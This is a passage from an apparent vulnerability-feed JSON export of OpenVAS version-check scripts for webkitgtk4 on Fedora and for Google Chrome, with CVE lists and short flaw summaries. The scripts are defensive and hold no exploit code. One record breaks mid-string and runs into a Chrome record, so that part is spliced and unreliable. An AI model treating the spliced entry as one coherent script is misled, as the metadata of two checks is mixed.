FEDORA-2017-9d572cc64a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9d572cc64a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VIXDC655D7574NMXWPNXAFDI2JHBTWZR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-04T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310873200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873200", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_73d6a0dfbb_webkitgtk4_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873200\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:46:47 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-73d6a0dfbb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YOV6OOFLOHZALSKLNVHTQVXB43SXE5LW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n 
script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-04T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310873180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_24bddb96b5_webkitgtk4_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without 
even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873180\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:47:40 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-24bddb96b5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5WQG4TVFXCPDMB3M6X46ISBMRZAHJZ43\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 
Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Sandbox escape in AppCache.\n\n - An input validation error in V8.\n\n - Heap buffer overflow error in Little CMS in PDFium.\n\n - Multiple URL and UI spoofing errors in Omnibox and Extensions.\n\n - Multiple memory corruption errors in Angle and GPU Internals.\n\n - Multiple use after free errors in V8 and Blink.\n\n - Lack of limits on 'update' function in ServiceWorker.\n\n - Security UI occlusion in full screen mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attackers\n to bypass security restrictions, execute arbitrary code, conduct spoofing attack\n and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 70.0.3538.67 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 70.0.3538.67\n or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"70.0.3538.67\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"70.0.3538.67\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:52:37", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310814095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814095", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google 
Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814095\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2018-5179\", \"CVE-2018-17477\", \"CVE-2018-17476\", \"CVE-2018-17475\",\n \"CVE-2018-17474\", \"CVE-2018-17473\", \"CVE-2018-17462\", \"CVE-2018-17471\",\n \"CVE-2018-17470\", \"CVE-2018-17469\", \"CVE-2018-17468\", \"CVE-2018-17467\",\n \"CVE-2018-17466\", \"CVE-2018-17465\", \"CVE-2018-17464\", \"CVE-2018-17463\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 11:15:02 +0530 (Wed, 17 Oct 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple 
vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Sandbox escape in AppCache.\n\n - An input validation error in V8.\n\n - Heap buffer overflow error in Little CMS in PDFium.\n\n - Multiple URL and UI spoofing errors in Omnibox and Extensions.\n\n - Multiple memory corruption errors in Angle and GPU Internals.\n\n - Multiple use after free errors in V8 and Blink.\n\n - Lack of limits on 'update' function in ServiceWorker.\n\n - Security UI occlusion in full screen mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attackers\n to bypass security restrictions, execute arbitrary code, conduct spoofing attack\n and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 70.0.3538.67 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 70.0.3538.67\n or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"70.0.3538.67\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"70.0.3538.67\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:34:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-25T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2018:3396-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17472", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851948", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851948", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of 
their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the L